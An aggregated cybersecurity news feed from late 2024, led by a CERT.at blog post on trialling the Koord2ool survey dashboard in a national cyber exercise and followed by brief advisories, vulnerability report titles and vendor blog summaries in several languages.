As part of the EU-funded project “AWAKE”, we built the Koord2ool, which is a tool that allowed us to track the state of an incident across our constituency over time. We implemented this application as an extension to LimeSurvey (an Open Source survey tool) which generates a dashboard to visualize the state of the answers over time. For this to work, the survey needs to have the following properties: We must identify participants in order to track their responses over the time. In LimeSurvey parlance, this is called “Closed Mode”: There is a database of participants, which also contains a unique token for each e-mail address. This token is sent in the invitation mail sent to each participant and is used for access control and user tracking. A participant must be able to repeatedly fill out the survey. This is controlled by the “Allow multiple responses or update responses with one access code:” setting. I recommend to also set “Enable participant-based response persistence“ to „On“. This helps with the consistency of the answers. The code is here: https://github.com/ait-cs-IaaS/koord2ool Last week, we participated in a national cyber exercise that was organised by the KSÖ with AIT as the technology partner. This year, I focussed on getting the Koord2ool up and running and see how the concept performs during the exercise. This blogpost documents my experience. I used the “introduction day” to test the installation of the Koord2ool inside AIT’s cyber range. It took us a bit of time to correctly configure the email settings – LimeSurvey needs to be able to send out the invitations, and to prepare a basic survey with all the right settings and test the procedure of adding new questions to an existing survey – see below for details. At the start of the exercise, I had a basic survey ready with two parts: A “Meta” group to ask questions about the exercise itself: are you having fun? Do the tools work? Etc. A “Status” group where I started with a basic “What is the status of your fictional company?” question. As the game progressed, I added more and more questions and sent our reminder emails to the players to keep filling out our survey. Results: The Koord2ool use wasn’t officially announced by the exercise moderator, and the invitations were sent only to the official “office@” email-address of the virtual companies. Maybe some players thought that this was a phishing inject, it took us some time to get answers from every company. Over the time, this looked like this: The y-axis are the participants, the x-axis is the time. The dots are answers. So, from the 6 virtual companies, we got both one, two and three answers from two each. Regrettably, this was not enough to really track the state of the game over the full exercise. This resulted in the following graph describing the status of the companies: Lessons Learned We really need to make answering the survey an official part of the exercise with regular announcements by the organizers to fill out the survey at predefined intervals. I’m not 100% sure that we really managed to squash all bugs regarding the data processing. (but maybe it’s just the CERT.at installation which I use right now to look at the exported/imported survey data) The process of adding questions is a bit cumbersome, it needs the following steps: Stop / Deactive the survey Edit the structure of the survey – add new questions Activate survey, choose “closed mode” and select “restore participants” In the responses tab, use “import” to restore previously archived answers LimeSurvey tries to be clever by not allowing invitations / reminders to be sent to participants who already have received an invitaion or have submitted in a response respectively. This makes a lot of sense for “normal” surveys, but not for our use-case where we need multiple answers from participants. The way to work around this feature is to use the “Bulk Edit” functionality in the participant management to reset the “Invitation sent” and “response received” columns for all respondents. Let's see how Koord2ool will work in future exercises and real world incidents.

https://www.cert.at/en/blog/2024/11/testing-the-koord2ool
Riasztás FortiManager alkalmazást érintő sérülékenységről
2024-11-11T12:34:42Z | 1731328482

A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Fortinet FortiManager alkalmazást érintő kritikus kockázati besorolású sérülékenység kapcsán, annak súlyossága, kihasználhatósága és a szoftver széleskörű elterjedtsége miatt.

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-fortimanager-alkalmazast-erinto-serulekenysegrol/
Stop Data Loss in its Tracks with Cato DLP Enhancements
2024-11-11T09:14:35Z | 1731316475

Data Loss Prevention (DLP) solutions are essential for safeguarding valuable data. They scan traffic to prevent the transmission of sensitive information such as credit card details and personal identifiable information (PII) such as Social Security Numbers (SSNs). However, traditional DLP solutions are often complex to configure, manage, and operate. Setting up DLP policies typically requires... The post Stop Data Loss in its Tracks with Cato DLP Enhancements   appeared first on Cato Networks.

https://www.catonetworks.com/blog/stop-data-loss-in-its-tracks-with-cato-dlp-enhancements/
Finding Solutions to Meet PCI DSS v4.0 Requirements 6.4.3 and 11.6.1
2024-11-08T14:00:00Z | 1731074400

https://www.akamai.com/blog/security/2024/nov/meet-pci-dss-v40-requirements
Riias toimub Balti riikide küberturvalisuse innovatsioonifoorum
2024-11-08T13:26:45Z | 1731072405

Eesti, Läti ja Leedu riiklikud küberturvalisuse keskused korraldavad 3.–5. detsembrini Riias innovatsioonifoorumi CyberBazaar 2024.

https://ria.ee/uudised/riias-toimub-balti-riikide-kuberturvalisuse-innovatsioonifoorum
Oktoober küberruumis: Eesti inimesed kaotasid õngitsuste ja pettustega suuri summasid
2024-11-08T07:47:22Z | 1731052042

Riigi Infosüsteemi Ameti (RIA) kuuülevaatest selgub, et oktoobris kaotasid Eesti inimesed küberkurjategijatele kõige sagedamini raha kullerfirmade nimel tehtud õngitsustega ja Facebook Marketplace’is korraldatud pettustega.

https://ria.ee/uudised/oktoober-kuberruumis-eesti-inimesed-kaotasid-ongitsuste-ja-pettustega-suuri-summasid
Security Alert (A24-11-06): Multiple Vulnerabilities in Microsoft Edge
2024-11-08T04:00:00Z | 1731038400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai's Behavioral DDoS Engine: A Breakthrough in Modern DDoS Mitigation
2024-11-07T14:00:00Z | 1730988000

As digital infrastructure grows, so do the threats posed by DDoS attacks. See how the Akamai Behavioral DDoS Engine can keep your business online.

https://www.akamai.com/blog/security/2024/nov/akamais-behavioral-ddos-engine-breakthrough-in-modern-ddos-mitigation
Security Alert (A24-11-05): Multiple Vulnerabilities in Cisco Products
2024-11-07T04:00:00Z | 1730952000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
AI and the Future of Cybersecurity Work by Sohrob Kazerounian
2024-11-07T00:00:00Z | 1730937600

In recent years, new studies and institutes have emerged to explore which future jobs will stay human-driven—and which will be handed over to machines.

https://www.vectra.ai/blog/ai-and-the-future-of-cybersecurity-work
Joint advisory on the 2023 top routinely exploited vulnerabilities
2024-11-06T16:26:28Z | 1730910388

https://cyber.gc.ca/en/joint-advisory-2023-top-routinely-exploited-vulnerabilities
Post-secondary cyber security related programs guide
2024-11-06T15:23:54Z | 1730906634

https://cyber.gc.ca/en/education-community/academic-outreach-engagement/post-secondary-cyber-security-related-programs-guide
Rails Without Derails: Thwarting Code Injection Attacks
2024-11-06T13:00:00Z | 1730898000

https://www.akamai.com/blog/security/2024/oct/2024-october-ruby-on-rails-waf-code-injection-protection
Active Exploitation of Critical F5 BIG – IP Vulnerability (CVE–2023-46747) Uncovered in Bangladesh
2024-11-06T11:58:14Z | 1730894294

TLP: CLEAR Distribution: Public Type of Threat: RCE Vulnerability (CVE-2023-46747) Date: 06 November 2024   Executive Summary The Cyber Threat Intelligence Unit of the Bangladesh e-GOV Computer Incident Response Team (BGD e-GOV CIRT) has uncovered active evidence of compromise associated with a critical vulnerability in F5 BIG-IP systems, widely used across Bangladesh’s IT infrastructure. The investigation revealed that attackers managed to gain shell access on... Read More

https://www.cirt.gov.bd/f5-big-ip-vulneribility/
National Cyber Security Centre's weekly review – 42/2024
2024-11-06T10:48:48Z | 1730890128

Cooperation is essential to protect society’s services and functions against cyber threats. All of us can improve our common cyber security through our own actions by ensuring the safety of our own network devices. You will find the best advice on how to do this in the National Cyber Security Centre’s recently updated instructions.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-422024
National Cyber Security Centre's weekly review – 42/2024
2024-11-06T10:48:48Z | 1730890128

Cooperation is essential to protect society’s services and functions against cyber threats. All of us can improve our common cyber security through our own actions by ensuring the safety of our own network devices. You will find the best advice on how to do this in the National Cyber Security Centre’s recently updated instructions.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-422024
Leveraging Custom IOC Feeds for Enhanced Threat Detection
2024-11-06T09:47:25Z | 1730886445

Indicators of Compromise (IOCs) are vital components in cybersecurity, representing digital clues or evidence that signal a potential security breach or malicious activity in a computer system or network. Think of them as the fingerprints left behind by cybercriminals during or after a cyber-attack. Examples of common IOCs are:   Security teams use IOCs as red... The post Leveraging Custom IOC Feeds for Enhanced Threat Detection  appeared first on Cato Networks.

https://www.catonetworks.com/blog/leveraging-custom-ioc-feeds-for-enhanced-threat-detection/
Detsembris avalikkuse ette jõudev Eesti.ee mobiilirakendus sai testijatelt kõrge hinnangu
2024-11-06T08:28:45Z | 1730881725

Novembri alguses lõppenud Eesti.ee mobiilirakenduse testimises osales kokku 2300 vabatahtlikku, kellest ligi 600 andis rakendusele oma tagasiside. Detsembris avalikkuse ette jõudev Eesti.ee äpp sai testijatelt keskmiseks hinnanguks neli punkti viiest.

https://ria.ee/uudised/detsembris-avalikkuse-ette-joudev-eestiee-mobiilirakendus-sai-testijatelt-korge-hinnangu
Security Alert (A24-11-03): Multiple Vulnerabilities in Google Chrome
2024-11-06T04:00:00Z | 1730865600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-11-04): Multiple Vulnerabilities in Synology Products
2024-11-06T04:00:00Z | 1730865600

Synology has published security advisories to address multiple vulnerabilities in Synology products.

https://www.govcert.gov.hk/en/alerts_detail.php
HSM 5.6.0: Taking Centralized Management to the Next Level
2024-11-06T00:19:00Z | 1730852340

As someone who’s spent years in the cybersecurity trenches, I’m genuinely excited to walk you through the latest HSM 5.6.0 release. This update is packed with features that’ll make your life easier – whether you’re managing a small network or orchestrating a complex enterprise environment. Expanded Device Management: Breaking Down the Silos Remember the days […] The post HSM 5.6.0: Taking Centralized Management to the Next Level appeared first on Hillstone Networks.

https://www.hillstonenet.com/blog/hsm-5-6-0-taking-centralized-management-to-the-next-level/
Security Alert (A24-11-02): Multiple Vulnerabilities in Android
2024-11-05T04:00:00Z | 1730779200

Google has released Android Security Bulletin November 2024 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Inquérito para mapeamento de fundos para desenvolvimento de competências em cibersegurança
2024-11-05T00:00:00Z | 1730764800

Está disponível, até 29 de novembro, um inquérito que visa apoiar o Centro Europeu de Competências em Cibersegurança (ECCC), a Comissão Europeia e os Estados-Membros a direcionar fundos para resposta a necessidades do mercado quanto ao desenvolvimento de competências em cibersegurança e facilitação de sinergias entre os diferentes instrumentos a nível nacional e da União Europeia (UE). Esta iniciativa surge no âmbito da comunicação adotada pela Comissão Europeia quanto à Academia de Competências em Cibersegurança, que visa reunir informação e dar maior visibilidade a oportunidades de financiamento.O inquérito visa recolher informações sobre iniciativas que beneficiem de financiamento provenientes da UE/Nacional/misto, para apoiar o desenvolvimento de competências de cibersegurança, que: abranjam o atual quadro financeiro plurianual (QFP), no período 2021-2027; se centrem em ações de formação para profissionais (ensino superior, ensino vocacional e formação profissional e educação de adultos); abordem iniciativas em matéria de competências de cibersegurança (e não competências digitais no seu conjunto). O inquérito destina-se a: Representantes das instituições da UE que supervisionam estas iniciativas; Representantes dos Estados-Membros da UE que supervisionam estas iniciativas; Indústria da UE, nomeadamente startups, PMEs ou grandes empresas, que gerem ou beneficiam deste tipo de iniciativas; Instituições de ensino que oferecem iniciativas semelhantes; Indivíduos que beneficiam destas iniciativas. Os resultados do inquérito vão contribuir para o mapeamento dos investimentos relacionados com as competências de cibersegurança. O inquérito é divulgado no contexto do trabalho do Centro Europeu de Competências em Cibersegurança (ECCC), e não recolhe quaisquer informações privadas.Responder ao inquérito

https://dyn.cncs.gov.pt/pt/detalhe/art/135897/inquerito-para-mapeamento-de-fundos-para-desenvolvimento-de-competencias-em-ciberseguranca
Exploring Artificial Intelligence: Is AI Overhyped?
2024-11-04T14:00:00Z | 1730728800

Dive into AI technologies like inference, deep learning, and generative models to learn how LLMs and AI are transforming cybersecurity and tech industries.

https://www.akamai.com/blog/security/2024/nov/exploring-artificial-intelligence-is-ai-overhyped
CVSS v4.0 Turns One Year Old
2024-11-04T00:30:00Z | 1730680200

FIRST and the CVSS Special Interest Group (SIG) would like to wish a very happy first birthday to the newest version of CVSS, version 4.0!

https://www.first.org/blog/20241104-CVSS-v4_0-Turns-One-Year-Old
CVSS v4.0 Turns One Year Old
2024-11-04T00:30:00Z | 1730680200

FIRST and the CVSS Special Interest Group (SIG) would like to wish a very happy first birthday to the newest version of CVSS, version 4.0!

https://www.first.org/blog/20241104-CVSS-v4_0-Turns-One-Year-Old
Identifying Traffic from Shell Finder Bots
2024-11-01T23:04:58Z | 1730502298

A shell finder is a type of reconnaissance tool that is used by threat actors to identify websites that have already been compromised and contain backdoor shells. A backdoor shell is a form of malware that is added by a threat actor after gaining unauthorized access to a website. The purpose of a backdoor shell is […]

https://wpscan.com/blog/identifying-traffic-from-shell-finder-bots/
How Ransomware Is Delivered and How to Prevent Attacks
2024-11-01T07:00:00Z | 1730444400

https://www.akamai.com/blog/security/2024/nov/how-ransomware-is-delivered-prevent-attacks
Security Alert (A24-11-01): Multiple Vulnerabilities in Microsoft Edge
2024-11-01T04:00:00Z | 1730433600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
iboss Named Finalist in the 2024 Black Unicorn Awards
2024-10-31T17:58:01Z | 1730397481

iboss, a pioneer in Zero Trust Secure Access Service Edge (SASE) cloud security, today announced that it has been named a finalist in the prestigious 2024 Black Unicorn Awards. This recognition highlights iboss's exceptional growth, innovative technology, and significant impact on the cybersecurity landscape. The post iboss Named Finalist in the 2024 Black Unicorn Awards appeared first on iboss.

https://www.iboss.com/news/iboss-named-finalist-in-the-2024-black-unicorn-awards/
Protecting Your Digital Brand with Threat Intelligence Feeds
2024-10-31T14:45:57Z | 1730385957

Protecting your brand is key to success and trust. With more online platforms and digital threats emerging every day, companies are more vulnerable to fraud, brand misuse and other cybercrime. For companies at scale, especially those with large online platforms or e-commerce marketplaces, protecting your brand in this complex environment is a continuous challenge. The post Protecting Your Digital Brand with Threat Intelligence Feeds appeared first on Data443.

https://data443.com/protecting-your-digital-brand-with-threat-intelligence-feeds/
Red Flag Bulletin | November 2024 | US subsidiaries of TD Bank Group plead guilty to money laundering
2024-10-31T13:59:59Z | 1730383199

This month’s top stories US subsidiaries of TD Bank Group plead guilty to money laundering and violating the US Banking Secrecy Act and agree to pay USD 1.8 billion in penalties;  Subsidiary of US multinational aerospace and defence conglomerate RTX Corporation agrees to pay USD 950 million to settle bribery and fraud investigations relating to operations in Qatar; and  Executive at state-owned Italian IT company Sogei arrested for corruption amid wider investigation into public procurement involving three ministries, 14 companies, and 18 individuals.  Middle east and North Africa  US / Qatar: US defence contractor agrees to pay USD 950 million to settle bribery and fraud investigations relating to operations in Qatar   On 16 October, Raytheon Company, a subsidiary of the US multinational aerospace and defence conglomerate RTX Corporation, agreed to pay over USD 950 million to settle investigations by the US Justice Department into fraudulent activities and violations of the US Foreign Corrupt Practices and Arms Export Control Acts in relation to the company’s operations in Qatar. Raytheon entered intodeferred prosecution agreements (DPA) in separate cases in federal courts in the Eastern District of New York and Massachusetts. Raytheon was charged with conspiracy to bribe a Qatari government official in the Qatar Emiri Air Force, the air arm of the Qatari armed forces, to obtain lucrative contracts, and with wilfullyfailing to disclose the bribes in export licensing applications with the State Department – a requirement under US regulations.Raytheon additionally admitted to two counts of major fraud against the US Department of Defense in relation to the provision of defence services and equipment. Both DPA agreements require Raytheon to hire independent monitors to oversee compliance with anti-corruption and anti-fraud laws and to show good conduct for three years.

https://www.s-rminform.com/red-flag-bulletin/november-2024
Latvia and Canada Create a Unique Training Course
2024-10-31T13:21:26Z | 1730380886

In collaboration with the Cybersecurity Incident Response Institution – CERT.LV, the Latvian Ministry of Defence, and the Canadian Armed Forces Cyber Forces (CAF), a specialized training course has been developed to advance threat-hunting capabilities. This course integrates international expertise to provide a robust foundation for effective threat detection.

https://cert.lv/en/2024/10/latvia-and-canada-create-a-unique-training-course
Fuzzing between the lines in popular barcode software
2024-10-31T13:00:18Z | 1730379618

Fuzzing—one of the most successful techniques for finding security bugs, consistently featured in articles and industry conferences—has become so popular that you may think most important software has already been extensively fuzzed. But that’s not always the case. In this blog post, we show how we fuzzed the ZBar barcode scanning library […]

https://blog.trailofbits.com/2024/10/31/fuzzing-between-the-lines-in-popular-barcode-software/
Start Strong: How CISOs Make an Impact from Day 1
2024-10-31T07:10:55Z | 1730358655

CISO is a high-profile position with high expectations – and the impact clock starts ticking day 1. At Cato, we’ve had thousands of conversations with CISOs from companies of all sizes across different industries – learning about what works, what doesn’t, and the strategies that boost proactive, visionary leadership.  This blog post, along with the... The post Start Strong: How CISOs Make an Impact from Day 1 appeared first on Cato Networks.

https://www.catonetworks.com/blog/start-strong-how-cisos-make-an-impact-from-day-1/
Security Alert (A24-10-28): Multiple Vulnerabilities in QNAP Products
2024-10-31T04:00:00Z | 1730347200

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
GreyNoise Intelligence Discovers Zero-Day Vulnerabilities in Live Streaming Cameras with the Help of AI
2024-10-31T00:00:00Z | 1730332800

GreyNoise has discovered previously undisclosed zero-day vulnerabilities in IoT-connected live streaming cameras, leveraging AI to catch an attack before it could escalate. This marks one of the first instances where threat detection has been augmented by AI to discover zero-day vulnerabilities.

https://www.greynoise.io/blog/greynoise-intelligence-discovers-zero-day-vulnerabilities-in-live-streaming-cameras-with-the-help-of-ai
The Persistent Perimeter Threat: Strategic Insights from a Multi-Year APT Campaign Targeting Edge Devices
2024-10-31T00:00:00Z | 1730332800

Discover insights from a multi-year APT campaign that exploited network perimeter vulnerabilities to target high-value entities, revealing critical gaps in edge device security. GreyNoise shares strategic intelligence and actionable steps for defending against these sophisticated threats, empowering security teams to strengthen their perimeter defenses against ongoing exploitation.

https://www.greynoise.io/blog/the-persistent-perimeter-threat-strategic-insights-from-a-multi-year-apt-campaign-targeting-edge-devices
Canadian Centre for Cyber Security releases National Cyber Threat Assessment 2025-2026
2024-10-30T15:11:10Z | 1730301070

https://www.canada.ca/en/communications-security/news/2024/10/canadian-centre-for-cyber-security-releases-national-cyber-threat-assessment-2025-2026.html
National Cyber Threat Assessment 2025-2026
2024-10-30T14:45:04Z | 1730299504

The National Cyber Threat Assessment 2025-2026 highlights the cyber threats facing individuals and organizations in Canada and how they will evolve in the coming years.

https://cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026
6 Steps for Cyber Resilience During the 2024 U.S. Presidential Election
2024-10-30T13:00:00Z | 1730293200

Learn about the risks to service availability during the 2024 U.S. presidential election ? and the six steps you can take now to ensure your cyber resilience.

https://www.akamai.com/blog/security/2024/oct/6-steps-cyber-resilience-during-2024-us-presidential-election
Three Key Takeaways from TransUnion Annual Summit 2024
2024-10-30T11:04:08Z | 1730286248

Global information and insights company TransUnion recently hosted its annual UK Summit on ‘Data-driven Decisions for Smarter Growth’. The event brought together leading companies from finance, banking, fintech, insurance and other sectors, to discuss the state of the industry and consumer financial health, including the growing impact of fraud and the importance of credit education and monitoring.Sam Welch, Chief Revenue Officer at TransUnion in the UK, said: “Bringing together industry leaders through expert-led sessions and tailored breakouts for different sectors, this year’s UK Summit drove a lot of interesting discussions around industry challenges and the outlook for growth as well as empowering and educating consumers. By leveraging robust data to help inform smarter decisions for growth, we at TransUnion are helping to create a financial landscape that's transparent, inclusive and built on trust.”TransUnion hosted a series of panel discussions, breakout sessions and invited industry leaders to discuss some of the most pressing topics in the current financial services sector. Three of the key takeaways from the event were:1.     Consumer optimism is bouncing backThe ongoing cost-of-living crisis remains front of mind for consumers even as inflation tapers-off. TransUnion’s Q3 2024 Consumer Pulse survey revealed that for 85% of consumers, inflation is one of their top three concerns over the next three months.Yet, consumer sentiment has improved, driven by growing wages, particularly the National Minimum Wage. As attitudes to spending relax, 46% of consumers are optimistic about their household finances over the next twelve months.As consumer optimism bounces back and the market becomes more competitive, lenders should foster deeper connections with existing customers by enhancing user experience and using consumer credit monitoring to help boost engagement.2.       Safeguard against potential fraud without compromising customer experienceThird-party fraud continues to be a major area of concern as consumers increasingly fall prey to sophisticated attacks. Over the last 12 months, 2.4 million fraud incidents involved a monetary loss,i with 56% of third-party fraud transactions sitting with Gen Z and Millennials.iiBusinesses face the delicate balancing act of stopping fraud in real-time while also making it as simple as possible for their customers to transact with them. Nearly three-quarters (74%) of consumers want to be confident that their personal data will not be compromised, while over half (56%) look for an easy log-in authentication process. By leveraging fraud analytics to identify suspicious behaviours using risk insights, device information and behavioural analytics, businesses can help stop fraud in real-time, without disrupting the user experience for legitimate customers.3.     Empower consumers through credit monitoring and educationWithin the context of the cost-of-living crisis and growing fraud risk, financial awareness is key to strengthening consumer trust. 21 million consumers across the UK already monitor their credit report,iii with Gen Z and Millennials more likely to use credit monitoring than older generations.ivCredit monitoring provides consumers with a clearer view of their overall financial picture, with nearly two in five (39%) credit monitors learning to manage their credit score, while 29% were able to secure better credit offers and one in five (20%) paid down debt.With nearly two-thirds (64%) of consumers likely to use credit monitoring if offered at no cost, lenders have a prime opportunity to empower consumers with credit education tools that can drive financial inclusion while improving access to credit and help protect against fraud.Commenting on the takeaways from the summit, James O’Donnell, director of research & consulting at TransUnion in the UK, noted that: “Our data reveals an increasingly positive picture of consumer financial health. Despite the challenging macro environment, the majority of consumers remain resilient, and are optimistic about the future of their personal finances. Much of this optimism is emerging on the back of lower inflation pressure and dropping interest rates. Ultimately, we’re getting a sense of relief from consumers and lenders alike.“As we move into 2025, lenders now have the opportunity to foster deeper connections and service the unmet demand for credit which we’ve observed over the last two years. Though other pressures remain, with high consumer expectations for ease of use clashing with the need to protect consumers from increasing levels of third party fraud. By tapping into the right data at the right time, businesses can secure actionable insights and deliver friction right customer experiences that drive real impact.”To learn more about TransUnion’s products and solutions visit the websiteNotes:i ONS, Crime in England and Wales, Statistical Bulletin, released 24 July 2024, for year ending March 2024ii Cifas data, 2022-2023iii TransUnion Consumer Credit Monitoring Populationiv TransUnion Consumer Credit Monitoring Report

https://newsroom.transunion.co.uk/three-key-takeaways-from-transunion-annual-summit-2024/
Security Alert (A24-10-26): Multiple Vulnerabilities in Google Chrome
2024-10-30T04:00:00Z | 1730260800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-10-27): Multiple Vulnerabilities in Firefox
2024-10-30T04:00:00Z | 1730260800

Mozilla has published the advisories (MFSA2024-55, MFSA2024-56 and MFSA2024-57) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
NSFOCUS Showcases Two Groundbreaking Topics at SAS 2024
2024-10-30T01:24:42Z | 1730251482

NSFOCUS Showcases Two Groundbreaking Topics at SAS 2024: An In-Depth Analysis of the DarkCasino APT Group and the Evolution of New Botnets. SANTA CLARA, Calif., October 30, 2024 – The 17th Security Analyst Summit (SAS), a premier global event focused on cybersecurity, recently concluded in Bali, Indonesia, where NSFOCUS was invited to participate. As the […] The post NSFOCUS Showcases Two Groundbreaking Topics at SAS 2024 appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-showcases-two-groundbreaking-topics-at-sas-2024/
LevelOne WBR-6012 Web Application denial of service vulnerability
2024-10-30T00:00:00Z | 1730246400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2001
LevelOne WBR-6012 Web Application weak authentication vulnerability
2024-10-30T00:00:00Z | 1730246400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1984
LevelOne WBR-6012 Web Application buffer overflow vulnerability
2024-10-30T00:00:00Z | 1730246400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1997
LevelOne WBR-6012 Web Application improper resource allocation vulnerability
2024-10-30T00:00:00Z | 1730246400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1982
LevelOne WBR-6012 Web and FTP cleartext transmission vulnerability
2024-10-30T00:00:00Z | 1730246400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1983
LevelOne WBR-6012 FTP improper input validation vulnerability
2024-10-30T00:00:00Z | 1730246400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1998
LevelOne WBR-6012 hard-coded password vulnerability
2024-10-30T00:00:00Z | 1730246400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1979
LevelOne WBR-6012 Web Application cross-site request forgery (CSRF) vulnerability
2024-10-30T00:00:00Z | 1730246400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1981
LevelOne WBR-6012 Web Application information disclosure vulnerability
2024-10-30T00:00:00Z | 1730246400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1985
LevelOne WBR-6012 Web Application authentication bypass vulnerability
2024-10-30T00:00:00Z | 1730246400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1996
LevelOne WBR-6012 Web Application information disclosure vulnerability
2024-10-30T00:00:00Z | 1730246400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1986
CyberKnight appoints Samir Omar as GM Sales for KSA
2024-10-29T15:09:57Z | 1730214597

The post CyberKnight appoints Samir Omar as GM Sales for KSA appeared first on CyberKnight.

https://cyberknight.tech/blog/cyberknight-appoints-samir-omar-as-gm-sales-for-ksa/
CyberKnight to elevate cyber resilience with Zero Trust Security 2.0 at GITEX 2024
2024-10-29T15:06:00Z | 1730214360

The post CyberKnight to elevate cyber resilience with Zero Trust Security 2.0 at GITEX 2024 appeared first on CyberKnight.

https://cyberknight.tech/blog/cyberknight-to-elevate-cyber-resilience-with-zero-trust-security-2-0-at-gitex-2024/
New crazy payloads in the URL Validation Bypass Cheat Sheet
2024-10-29T13:59:13Z | 1730210353

The strength of our URL Validation Bypass Cheat Sheet lies in the contributions from the web security community, and today’s update is no exception. We are excited to introduce a new and improved IP a

https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet
Top Canadian cyber security body releases flagship guidance for critical infrastructure
2024-10-29T13:34:01Z | 1730208841

https://www.canada.ca/en/communications-security/news/2024/10/top-canadian-cyber-security-body-releases-flagship-guidance-for-critical-infrastructure.html
Cyber Security Readiness Goals: Securing Our Most Critical Systems
2024-10-29T13:01:48Z | 1730206908

https://cyber.gc.ca/en/cyber-security-readiness/cyber-security-readiness-goals-securing-our-most-critical-systems
Cross-Sector Cyber Security Readiness Goals Toolkit
2024-10-29T13:00:00Z | 1730206800

https://cyber.gc.ca/en/cyber-security-readiness/cross-sector-cyber-security-readiness-goals-toolkit
National Cyber Security Centre's weekly review – 43/2024
2024-10-29T12:22:36Z | 1730204556

This week, we report on denial-of-service attacks and the phenomenon of companies having their open invoices intercepted by various parties, most likely in preparation for billing fraud. Other topics include the Kaikki liikkeessä and Cyber Security Nordic events, as well as security development support for more than 300 companies.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-432024
National Cyber Security Centre's weekly review – 43/2024
2024-10-29T12:22:36Z | 1730204556

This week, we report on denial-of-service attacks and the phenomenon of companies having their open invoices intercepted by various parties, most likely in preparation for billing fraud. Other topics include the Kaikki liikkeessä and Cyber Security Nordic events, as well as security development support for more than 300 companies.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-432024
Beyond the Login ? Keeping Accounts Secure with Lifecycle Protection
2024-10-29T10:00:00Z | 1730196000

https://www.akamai.com/blog/security/2024/oct/keeping-accounts-secure-with-lifecycle-protection
Security Alert (A24-10-25): Multiple Vulnerabilities in Apple iOS and iPadOS
2024-10-29T04:00:00Z | 1730174400

Apple has released iOS 17.7.1, iOS 18.1, iPadOS 17.7.1 and iPadOS 18.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Bad Bots: 6 Common Bot Attacks and Why They Happen
2024-10-28T11:00:00Z | 1730113200

Learn about the different types of bot attacks, why they happen, and how to protect your website from these threats with effective bot mitigation strategies.

https://www.akamai.com/blog/security/2024/oct/bad-bots-6-common-bot-attacks-and-why-they-happen
Why IT Leaders Need DEM to Drive Success in the Hybrid Cloud Era
2024-10-28T10:25:50Z | 1730111150

In today’s rapidly evolving digital landscape, IT leaders, whether CIOs, CISOs, or VPs of IT, are responsible for driving a range of initiatives that enable business growth and success. Projects like cloud migration, hybrid workforce enablement, and SaaS adoption are now essential. However, these initiatives carry inherent risks that need to be carefully managed, especially... The post Why IT Leaders Need DEM to Drive Success in the Hybrid Cloud Era appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-it-leaders-need-dem-to-drive-success-in-the-hybrid-cloud-era/
Por que os testes gratuitos são essenciais na cibersegurança?
2024-10-26T01:20:32Z | 1729905632

https://nsfocusglobal.com/web-stories/por-que-os-testes-gratuitos-sao-essenciais-na-ciberseguranca/
Statement on People's Republic of China reconnaissance of Canadian systems
2024-10-25T19:48:27Z | 1729885707

https://cyber.gc.ca/en/news-events/statement-peoples-republic-china-reconnaissance-canadian-systems
A deep dive into Linux’s new mseal syscall
2024-10-25T13:00:18Z | 1729861218

If you love exploit mitigations, you may have heard of a new system call named mseal landing into the Linux kernel’s 6.10 release, providing a protection called “memory sealing.” Beyond notes from the authors, very little information about this mitigation exists. In this blog post, we’ll explain what this syscall is, including […]

https://blog.trailofbits.com/2024/10/25/a-deep-dive-into-linuxs-new-mseal-syscall/
Security Alert (A24-10-24): Multiple Vulnerabilities in Microsoft Edge
2024-10-25T04:00:00Z | 1729828800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Governo aprova medidas para reforçar cibersegurança
2024-10-25T00:00:00Z | 1729814400

O Conselho de Ministros aprovou, no dia 24 de outubro, dois projetos de diplomas na área da cibersegurança e dos serviços digitais, um dos quais, que assegura a transposição para a ordem jurídica interna da nova Diretiva da União Europeia para a Cibersegurança – Diretiva (UE) 2022/2555 de 14 de dezembro de 2022, mais conhecida por “Diretiva NIS 2” – e que vai ser submetido, brevemente, a consulta pública. Saiba mais sobre as medidas aprovadas pelo Governo.Consulte a área dedicada ao esclarecimento de algumas questões frequentes associadas à Diretiva SRI 2 (NIS 2).

https://dyn.cncs.gov.pt/pt/detalhe/art/135896/governo-aprova-medidas-para-reforcar-ciberseguranca
